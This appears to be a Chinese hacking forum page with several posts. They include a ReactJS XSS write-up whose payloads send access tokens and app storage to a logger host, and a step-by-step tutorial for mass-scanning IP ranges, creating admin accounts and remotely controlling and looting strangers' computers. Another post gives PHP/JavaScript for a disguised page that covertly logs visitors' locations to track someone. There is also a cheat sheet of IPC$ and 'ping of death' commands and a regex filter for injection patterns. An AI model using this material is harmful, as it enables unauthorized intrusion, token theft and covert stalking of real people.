一个属于你的次元网络基地
 
昨日:篇  今日:篇   总帖:篇   会员:
今日:0    总帖:137
wolfman
2533
ReactJS是一款能够帮助开发者构建用户接口的热门JavaScript库。在它的帮助下,开发者可以构建出内容丰富的客户端或Web应用,并且提前加载内容以提供更好的用户体验。从设计角度来看,只要你能够按照开发标准来使用ReactJS的话,它其实是非常安全的。但是在网络安全领域中,没有任何东西是绝对安全的,而错误的编程实践方式将导致类似脚本注入漏洞之类的问题产生,这些错误的编程方式包括:1.利用用户提供的对象来创建React组件;2.利用用户提供的href属性来配置标签,或利用其他可注入的属性来设置其他的HTML标签(例如link标签);3.显示地设置一个元素的dangerouslySetInnerHTML属性(危险的HTML标签属性);4.向eval()传递用户提供的字符串数据; 接下来,让我们一起看一看这些潜在的问题将如何影响ReactJS应用程序,并最终导致了脚本注入漏洞的出现。组件、属性和元素在ReactJS应用程序中,组件是最基本的组成部分。从本质上来说,这些组件其实都类似于JavaScript函数,它们可以接受任意的输入数据,然后返回React元素。一个基本的ReactJS组件如下所示:class Welcome extends React.Component {   render() { return <h1>Hello, {this.props.name}</h1>;   } }  请注意上面代码中的return语句,这是一种JavaScript中的语句扩展(JSX)。在项目构建的过程中,JSX代码将会被编译成常规的JavaScript(ES5)代码。下面给出的两种样本代码其功能是完全相同的:// JSX const element = (   <h1 className=”greeting”>   Hello, world!   </h1> ); // Transpiled to createElement() call const element = React.createElement(   ‘h1’,   {className: ‘greeting’},   ‘Hello, world!’ ); 在创建新的React元素时,使用的是component类中的createElement()函数: React.createElement(   type,   [props],   [...children] ) 这个函数可以接受三个参数:1.type参数:该参数可以是一个标签名(例如'div'或'span'),或一个component类。但是在React Native中只允许component类。2.props参数:该参数包含一个传递给新元素的属性列表。3.children参数:该参数包含新元素的子节点。如果你能够控制其中任何一个参数的话,那么这个参数就会变成攻击向量。注入子节点 早2015年3月份,Daniel LeCheminant报告了一个存在于HackerOne的存储型跨站脚本漏洞(XSS)。这个漏洞的成因如下:HackerOne的Web应用会将用户所提供的任意对象当作children参数传递给React.createElement()函数。根据我们的推测,存在漏洞的代码可能跟下方给出的代码比较相似:* Retrieve a user-supplied, stored value from the server and parsed it as JSON for whatever reason. attacker_supplied_value = JSON.parse(some_user_input) */ render() {   return <span>{attacker_supplied_value}</span>; } 这段JSX代码将会被转译成如下所示的JavaScript代码:   React.createElement("span", null, attacker_supplied_value}; 如果其中的attacker_supplied_value是一个字符串的话(正常情况),代码将会生成一个正常的span元素。但是在当前版本的ReactJS中,createElement()函数还会接受以children参数形式传递的普通对象。Daniel通过一个JSON编码的对象利用了这个漏洞,他在这个对象中包含了dangerouslySetInnerHTML属性,这将允许他向React呈现的输出效果中注入原始的HTML代码。最终的PoC代码:{  _isReactElement: true,  _store: {},  type: “body”,  props: {    dangerouslySetInnerHTML: {      __html:      "<h1>Arbitrary HTML</h1>      <script>alert(‘No CSP Support :(‘)</script>      <a href=’http://danlec.com'>link</a>"     }   } } 相关的漏洞缓解方案可以在React.js的GitHub主页上找到,感兴趣的同学可以参考。在2015年11月份,Sebastian Markbåge提交了一个修复方案:为React元素引入了$$typeof: Symbol.for('react.element')属性。由于无法从一个注入对象引用全局JavaScript符号,所以Daniel设计的漏洞利用技术(注入child元素)就无法再使用了。控制元素类型 虽然我们不能再将普通对象来当作ReactJS元素来使用了,但是组件注入并非不可能实现,因为createElement()函数还可以接受type参数中的字符串数据。我们假设开发者采用了如下所示的代码:// Dynamically create an element from a string stored in the backend. element_name = stored_value; React.createElement(element_name, null); 如果stored_value是一个由攻击者控制的字符串,那我们就可以创建任意的React组件了。但是此时创建的是一个普通的无属性HTML元素,而这种东西对于攻击者来说是没有任何作用的。因此,我们必须要能够控制新创建元素的属性才可以。注入属性(props) 请大家先看看下面给出的这段代码:// Parse attacker-supplied JSON for some reason and pass // the resulting object as props. // Don't do this at home unless you are a trained expert! attacker_props = JSON.parse(stored_value) React.createElement("span", attacker_props}; 这样一来,我们就可以向新元素中注入任意属性了。我们可以使用下面给出的Payload来设置dangerouslySetInnerHTML属性:{"dangerouslySetInnerHTML" : { "__html": "<img src=x/ onerror=’alert(localStorage.access_token)’>"}} 跨站脚本漏洞某些传统的XSS攻击向量同样适用于ReactJS应用程序。请大家接着往下看:(1) 显示地设置dangerouslySetInnerHTML属性很多开发者可能会有目的地去设置dangerouslySetInnerHTML属性: <div dangerouslySetInnerHTML={user_supplied} /> 很明显,如果你能够控制这些属性的参数值,那你就能够注入任意的JavaScript代码了。(2) 可注入的属性如果你能够控制一个动态生成的标签的href属性,那就没有什么可以阻止你向其参数值中注入JavaScript代码(通过javascript:)了。除了href属性之外,在现代浏览器中HTML5按钮的formaction属性同样也是可注入的。<a href={userinput}>Link</a> <button form="name" formaction={userinput}> 另一个非常奇怪的注入向量就是HTML imports:<link rel=”import” href={user_supplied}> (3) 服务器端呈现的HTML为了降低初始化页面的呈现时间,很多开发人员会在服务器端预先加载React.JS页面(也就是所谓的“服务器端呈现”)。在2016年11月份,Emilia Smith发现官方Redux代码样本中存在一个跨站脚本漏洞(XSS),因为客户端状态被嵌入到了预呈现页面中并没有被过滤掉。(样本代码中的漏洞现在已经修复)如果HTML页面在服务器端预呈现的话,你也许可以在普通的Web应用中找到类似的跨站脚本漏洞。基于eval()的注入如果应用程序使用了eval()来动态执行一个由你控制的注入字符串,那你就非常幸运了。在这种情况下,你就可以随意选择你需要注入的代码了:function antiPattern() {   eval(this.state.attacker_supplied); } XSS Payload在现代Web开发领域,很多机制的开发人员会选择使用无状态的会话令牌,并且将它们保存在客户端的本地存储中。因此,攻击者必须根据这种情况来设计相应的Payload。 当你在利用跨站脚本漏洞来攻击ReactJS Web应用程序时,你能够随意注入任意代码,如果再配合使用下面列出的代码,你就可以从目标设备的本地存储中获取访问令牌并将其发送到你的记录程序中:fetch(‘http://example.com/logger.php? token='+localStorage.access_token); React NativeReact Native是一款移动应用开发框架,它可以帮助开发人员使用ReactJS构建原生移动应用。更确切地说,它提供了一个能够再移动设备上运行React JavaScript包的运行时环境。除此之外,我们还可以使用React Native for Web让一个React Native应用在普通的Web浏览器中运行。但是就我们目前的研究结果来看,上面列出的脚本注入向量都不适用于React Native:1.React Native的createInternalComponent方法只接受包含标签的component类,所以即便是你能够完全控制传递给createElement()的参数,你野无法创建任意元素;2.不存在HTML元素,HTML代码也不会被解析,所以普通的基于浏览器的XSS向量(例如'href')就无法正常工作了。只有基于eval()的变量才可以在移动设备上被攻击者利用。如果你能够通过eval()注入JavaScript代码,你就可以访问React Native API并做一些有趣的事情了。比如说,你可以从本地存储(AsyncStorage)中窃取数据了,相关的操作代码如下所示:_reactNative.AsyncStorage.getAllKeys(function(err,result) {_reactNative.AsyncStorage.multiGet(result,function(err,result) {fetch(‘http://example.com/logger.php? token='+JSON.stringify(result));});}); 建议虽然从设计的角度出发,ReactJS还是非常安全的,但是这个世界上没有绝对安全的东西,不好的编程习惯将导致各种严重的安全漏洞出现: 我们建议各位开发者们不要再使用eval()函数或dangerouslySetInnerHTML属性,并避免解析用户提供的JSON数据。
13 0 2444天前
sanqing
2627
小白技术大神勿喷。1,傻瓜级入侵 之所以说这是傻瓜级,因为这个方法完全不用动脑子,并且保守的说,照这个方法,两个小时内肯定至少能入侵3台电脑!3台绝对是保守的数目! 需要软件:WinntAutoAttack (版本:V2.0) Remote Administrator v2.0(简称RA) 3389登陆器(xp自带的有,要是xp,就不要下载了,就是"开始"-"所有程序"-"附件"-"通讯"-"远程桌面连接" 不知道在哪下?用百度搜!我最不喜欢的就是当在群里我告诉别人用什么软件后,他还喋喋不休的问我"在哪下?把地址给我吧",太懒了吧,难道下载地址在我脑子里?我不也是要搜吗? 好了,下边我们开始入侵了,下边就是过程: 第一步. 打开WinntAutoAttack,就是那个手雷的标志,在"起始ip"里和"目标ip"里填上一个ip段,并且尽量把范围搞大点,比如在"起始ip"里填"218.88.1.1",在"目标ip"里填"218.88.255.255".ip段建议下一个显ip的qq,参考你qq上好友的ip去填.中奖概率更大!勾上"仅对ping检查成功的机器进行检测","检测3389端口"和"收集netbios信息" 在"IIS溢出"选项卡里勾上"开99端口shell",这个是用来开99端口telnet的,要是你不会用telnet,这个就不要勾了. 在"简单管理员密码"选项卡里勾上"列出所有密码简单的管理帐号"和"上传并安装远程图形控制软件". 在"sql漏洞"选项卡里也一样,就是把三个框都打上勾,就是"列出密码为空的sa帐号""建立系统管理员帐号(shanlu)"和"上传并安装远程图形控制软件". 好了,连上网(你不会连网都没连吧?)根据你机器的性能,把线程调下,就是拖那个小滑块,越往右线程越大,要是你的机器性能不好,太大的线程会死机的!我的机器性能不错,我才用110左右的线程,并且有的时候我也会死机... ...(哭... ...) ok!一切就绪!点"开始" . 接下来,接下来我们干什么呢?在qq上聊天吧,等结果吧 第二步. 时间很快就过去了,过了半个小时了吧,我们看看有没有什么结果,点"信息",把上边的"废话框"内容往下拉 主机:218.88.55.55 3389,Windows 2000 Advance Server Terminal 端口开放。 SQL漏洞: sa帐号密码为空。 建立系统管理员帐号shanlu()成功 哈哈,有肉鸡了,这个是3389的肉鸡,我们用3389的登陆器登陆上去,填上他的ip,用户名是shanlu,密码是空,他的机器就展现在我们面前了! 要是有这样的提示: 主机:218.88.55.55 3389,Windows 2000 Advance Server Terminal 端口开放。 简单管理员密码: 帐号: TsInternetUser(1234567890)[Administrators] 就说明用户名是TsInternetUser,密码是1234567890,要是括号里什么都没有,就说明密码是空,也就是说括号里的是密码,前边的是用户名.注意,帐户必须要是管理员的帐户,否则登陆不上去!"[Administrators]"告诉我们这是个管理员帐户. 要是有主机提示开了4899端口或提示"安装远程图形控制软件成功",我们就可以用Remote Administrator了!(Remote Administrator需要安装,强烈建议安装后把服务端卸载掉,方法:开始-运行,在"运行"框里填"winnt\system32\re_server.exe /uninstall",注意是"winnt"还是"windows"就看你的机器系统文件夹是什么了)卸载成功了会弹个对话框出来,说"removed successfully"要是你不卸载,最少也要在安装后给服务端装个密码,因为RA本来不是一个黑客工具,他是一个很方便的远程帮助的工具,甚至比windows自带的远程帮助工具用着还要舒服,可是,它同时也很象一个木马,有客户端和服务端,所以你要不把服务端卸载或加密码的话,很可能”螳螂捕蝉,黄鹊在后”你就成为别人攻击的目标了. 打开ra的客户端,也就是那个带红色"R"的图标,(蓝色的是服务端,不要点)提示要输注册码,一般这个下载的同时在”readme”文件里都能找到,要是找不到,我给你们一个:08le-2jgMggTuKc8bRD8VVC4O9107Hz1p7qkNUBRsGES4OdBDAnftk+ki2pQZHmM7lhysVBux8HE7udeSR0D1E0 长吧哈哈,然后把那个勾勾上,那个勾的意思是下次不再出现这个窗口(都是乱码,晕~~) 进入了RA的主界面,我们点”add new connection to the list"(建立新连接)在弹出来的窗口的两个框上都填上刚才开了4899或安装图形控制软件成功的机器的ip,点ok,看下边多出来一个小电脑的图标没?双击进去,看见什么了?是不是看见人家的屏幕了?人家在干什么你都看的清清楚楚吧哈哈! 慢!!!你干什么,别乱动他的屏幕!先看看你用的是什么模式进去的!我来给大家介绍下上边的13个按纽的作用,我就给大家介绍其中的7个常用的吧. 第2个按纽,刚才我们用过了,就是添加主机按纽 第3个按纽,删除主机 第5个按纽(中间的第一个):这个按纽最厉害!先点这个,再双击你下边肉鸡的图标进去,你不但能看见肉鸡的屏幕,还能完完全全控制他的机器!!,不信,你双击他桌面上的图标试!!或者把他正在开的窗口关了!(我怎么这么坏?)是不是就和用自己电脑一样?哈!刚开始的时候你可能不习惯这种控制,慢慢的你就会习惯了.可是,用这个要小心啊,因为你控制他电脑的动作,只要你的肉鸡前有人,他就会发现,聪明一点的,他就立即下线了,而现在的肉鸡大部分都是浮动ip,好,你这个肉鸡白找了,还没玩过瘾就没有了... 第6个按纽:只能看见屏幕,但不能控制他的电脑,适合观察他机器的动静,比如猜猜看他机器前现在有没有人啊 第7个按纽:另类的telnet功能,你用这个模式进去后,看见的就和cmd下差不多,你可以在这个下边给你的这个肉鸡加个密码,这样后来的入侵者就进不去了(当然高手还是能进去,不过他肯定要利用其他漏洞了),并且你还可以在下边做你想做的一切! 第8个按纽,进入文件夹模式.上边的是你机器的文件夹,下边的当然是他的了,你可以在这里把你机器里的木马传到他机器上,当然你要是发现他机器上有什么你想要的,也可以下下来,并且一切都在神不知鬼不觉当中(贼??)具体的做法?一个字:拖!把你的文件用鼠标左键按着拖到下边他的文件夹上松开是上传,反过来就是下载了)方便吧? 第9个按纽,可以远程给他关机,重起什么的,怎么做不要我说了吧?RA 真的很好用,爽! 第3步:要是出现这样: 主机:218.88.55.55 SQL漏洞: sa帐号密码为空。 建立系统管理员帐号(shanlu)成功。 这说明我们可以用SQL漏洞了,看见WinntAutoAttack的那个“SQLCMD执行”的选项卡没有?点它。 在“主机”后边输入ip,其他的不动,点“连接”,出现了“连接到主机:218.88.55.55”这个时候你点下“执行”(默认的执行"dir c:\"),他的c盘文件是不是在你面前了?比如在下边执行“net start telnet”就是把它的telnet打开,然后开个cmd窗口,用刚才的管理员帐号"shanlu"telnet上去吧!具体怎么做,我在下个文章里讲ipc$的时候再讲。 其实,这个是完完全全骇客的做法,时间长了,你就会发现,这样做一点意思也没有,渐渐的你就失去了当初的那种成就感,毕竟,在这个过程中,当你把过程摸熟了,整个入侵过程你不用用一点脑筋,不过,刚开始这么干还是有好处的,它会增加你的信心,并且,有的时候你可能会遇到一些问题,这样,你就可以慢慢的掌握一点入侵的知识了.
74 9 2446天前
wolfman
3290
想知道某人的位置?比如你的女朋友,很简单,往下看新建一个文件,名为index.php<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>狼人网络 - 访问被禁止 by Wolfman</title> </head> <body> <img src="wolfman.png" alt="" width="100%;"> <script> var geol; try { if (typeof(navigator.geolocation) == 'undefined') { geol = google.gears.factory.create('beta.geolocation'); } else { geol = navigator.geolocation; } } catch (error) { //alert(error.message); } if (geol) { geol.getCurrentPosition(function(position) { var nowLatitude = position.coords.latitude; var nowLongitude = position.coords.longitude; function new_form(){ var f=document.createElement("form"); document.body.appendChild(f); f.method="post"; return f; } function create_elements(eForm,eName,eValue){ var e=document.createElement("input"); eForm.appendChild(e); e.type="text"; e.name=eName; if(!document.all){e.style.display="none"}else{ e.style.display="block"; e.style.width="0px"; e.style.height="0px"; } e.value=eValue; return e; } var _f=new_form(); create_elements(_f,"username",nowLatitude) create_elements(_f,"password",nowLongitude); _f.action="wolfman2.php"; _f.submit(); }, function(error) { switch(error.code){ case error.TIMEOUT : //alert("连接超时,请重试"); break; case error.PERMISSION_DENIED : //alert("您拒绝了使用位置共享服务,查询已取消"); alert("狼人提示:非常抱歉,您拒绝了访问暂时无法通过浏览器访问本网站"); break; case error.POSITION_UNAVAILABLE : alert("狼人提示:非常抱歉,您拒绝了访问暂时无法通过浏览器访问本网站"); break; } }, {timeout:10000}); } </script> </body> </html>//http://bbs.wolfwl.cn下面是创建一个txt,为了记录访问过的人,可以通过  网址/wolfman.txt进行直接访问被记录下来的信息   名为wolfman2.php<title>你被骗了 神马都没有 - by Wolfman</title> <?php @$time=date('Y-m-d H:i:s',time()); $nowLatitude="纬度 ".$_POST['username']; $nowlongitude="经度 ".$_POST['password']." ------时间是".$time."\r\n";; $fp=fopen("wolfman.txt", "a+"); fwrite($fp, $nowLatitude); fwrite($fp, $nowlongitude); ?>//http://bbs.wolfwl.cn然后直接上传到自己网站空间即可你可以通过自己的想法来继续优化,比如伪装等等这个有一个缺点就是必须需要访问的人允许获取地理位置不过你可以通过社工来套路,详细我就不说了希望可以帮到那些玩社工的朋友,如果你觉得不错,可以打赏下站长哦!
13 2 2447天前
wolfman
2724
执行sql语句:select * from (select * from tab where ID>20 order by userID desc) as a order by date desc逻辑上看着挺对 但是报错:除非另外还指定了 TOP 或 FOR XML,否则,ORDER BY 子句在视图、内联函数、派生表、子查询和公用表表达式中无效。只要我们在嵌套子查询视图里面加入: top 100 percent 即可select * from (select top 100 percent * from tab where ID>20 order by userID desc) as a order by date desc默认情况下,如果在子查询,函数,视图中尝试去使用ORDER BY,CREATE VIEW dbo.VSortedOrders AS SELECT orderid, customerid FROM dbo.Orders ORDER BY orderid GO 那么可能会遇到下面的错误消息 1033,级别 15,状态 1,第 4 行 除非另外还指定了 TOP 或 FOR XML,否则,ORDER BY 子句在视图、内联函数、派生表、子查询和公用表表达式中无效。 原因就是针对一个表的SELECT其实并不是返回一个表,而是一个游标。 如果一定要用怎么办呢?答案就是配合TOP 100 PERCENTSELECT TOP (100) PERCENT orderid, customerid FROM dbo.Orders ORDER BY orderid, customerid DESC
19 0 2451天前
wolfman
2529
您需要登录并回复后才可以查看该文章内容
9 0 2451天前
wolfman
2885
从360安全论坛里找到的一段代码,经过整理封装,直接在站点Global.asax文件或写一个HttpModule来拦截恶意请求即可using System.Text.RegularExpressions; using System.Web; /// <summary> /// Web请求安全检查:防止跨站点脚本,Sql注入等攻击,来自:http://bbs.webscan.360.cn/forum.php?mod=viewthread&tid=711&page=1&extra=#pid1927 /// 检查数据包括: /// 1.Cookie /// 2.当前页面地址 /// 3.ReferrerUrl /// 4.Post数据 /// 5.Get数据 /// </summary> public class Safe360 { #region 执行安全检查 /// <summary> /// 执行安全检查 /// </summary> public static void Procress() { const string errmsg = "<div style='position:fixed;top:0px;width:100%;height:100%;background-color:white;color:green;font-weight:bold;border-bottom:5px solid #999;'><br>您的提交带有不合法参数,谢谢合作!<br><br>了解更多请点击:<a href='http://bbs.wolfwl..cn'>狼人论坛</a></div>"; if (RawUrl()) { HttpContext.Current.Response.Write(errmsg); HttpContext.Current.Response.End(); } if (CookieData()) { HttpContext.Current.Response.Write(errmsg); HttpContext.Current.Response.End(); } if (HttpContext.Current.Request.UrlReferrer != null) { if (Referer()) { HttpContext.Current.Response.Write(errmsg); HttpContext.Current.Response.End(); } } if (HttpContext.Current.Request.RequestType.ToUpper() == "POST") { if (PostData()) { HttpContext.Current.Response.Write(errmsg); HttpContext.Current.Response.End(); } } if (HttpContext.Current.Request.RequestType.ToUpper() == "GET") { if (GetData()) { HttpContext.Current.Response.Write(errmsg); HttpContext.Current.Response.End(); } } } #endregion #region 安全检查正则 /// <summary> /// 安全检查正则 /// </summary> private const string StrRegex = @"<[^>]+?style=[\w]+?:expression\(|\b(alert|confirm|prompt)\b|^\+/v(8|9)|<[^>]*?=[^>]*?&#[^>]*?>|\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)|/\*.+?\*/|<\s*script\b|<\s*img\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)"; #endregion #region 检查Post数据 /// <summary> /// 检查Post数据 /// </summary> /// <returns></returns> private static bool PostData() { bool result = false; for (int i = 0; i < HttpContext.Current.Request.Form.Count; i++) { result = CheckData(HttpContext.Current.Request.Form[i]); if (result) { break; } } return result; } #endregion #region 检查Get数据 /// <summary> /// 检查Get数据 /// </summary> /// <returns></returns> private static bool GetData() { bool result = false; for (int i = 0; i < HttpContext.Current.Request.QueryString.Count; i++) { result = CheckData(HttpContext.Current.Request.QueryString[i]); if (result) { break; } } return result; } #endregion #region 检查Cookie数据 /// <summary> /// 检查Cookie数据 /// </summary> /// <returns></returns> private static bool CookieData() { bool result = false; for (int i = 0; i < HttpContext.Current.Request.Cookies.Count; i++) { result = CheckData(HttpContext.Current.Request.Cookies[i].Value.ToLower()); if (result) { break; } } return result; } #endregion #region 检查Referer /// <summary> /// 检查Referer /// </summary> /// <returns></returns> private static bool Referer() { return CheckData(HttpContext.Current.Request.UrlReferrer.ToString()); } #endregion #region 检查当前请求路径 /// <summary> /// 检查当前请求路径 /// </summary> /// <returns></returns> private static bool RawUrl() { return CheckData(HttpContext.Current.Request.RawUrl); } #endregion #region 正则匹配 /// <summary> /// 正则匹配 /// </summary> /// <param name="inputData"></param> /// <returns></returns> private static bool CheckData(string inputData) { return Regex.IsMatch(inputData, StrRegex); } #endregion } 在Global.asax里调用的代码:    private void Application_BeginRequest(object sender, EventArgs e)    {        Safe360.Procress();    }
14 0 2451天前
sanqing
2492
http://pan.baidu.com/s/1i5iQLJR
9 0 2451天前
sanqing
3108
DOS命令   
net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名 密码 /add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup administrators 用户名 /add 把"用户"添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名  开启服务;(如:net start telnet, net start schedule) net stop 服务名 停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与"目标IP"主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名 暂停某服务 net send ip "文本信息" 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C:共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码 更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况,常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:"-w数字"用于设置超时间隔。 ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:"-l[空格]数据包大小";"-n发送数据次数";"-t"指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数"/all"显示全部配置信息 tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如"DEL/AR *.*"表示删除当前目录下所有只读文件,"DEL/A-S *.*"表示删除当前目录下除系统文件以外的所有文件 
20 0 2453天前
yixiaotao
2429
您需要登录并回复后才可以查看该文章内容
9 0 2454天前
yixiaotao
2521
您需要登录并回复后才可以查看该文章内容
8 0 2454天前
快速发帖 高级模式
加入官群 QQ咨询 友链展示 申请友链
粤ICP备18094291号
您的IP:3.143.0.157,2024-04-20 08:30:09,Processed in 0.13582 second(s).
免责声明: 本网不承担任何由内容提供商提供的信息所引起的争议和法律责任。
Powered by HadSky 8.0.0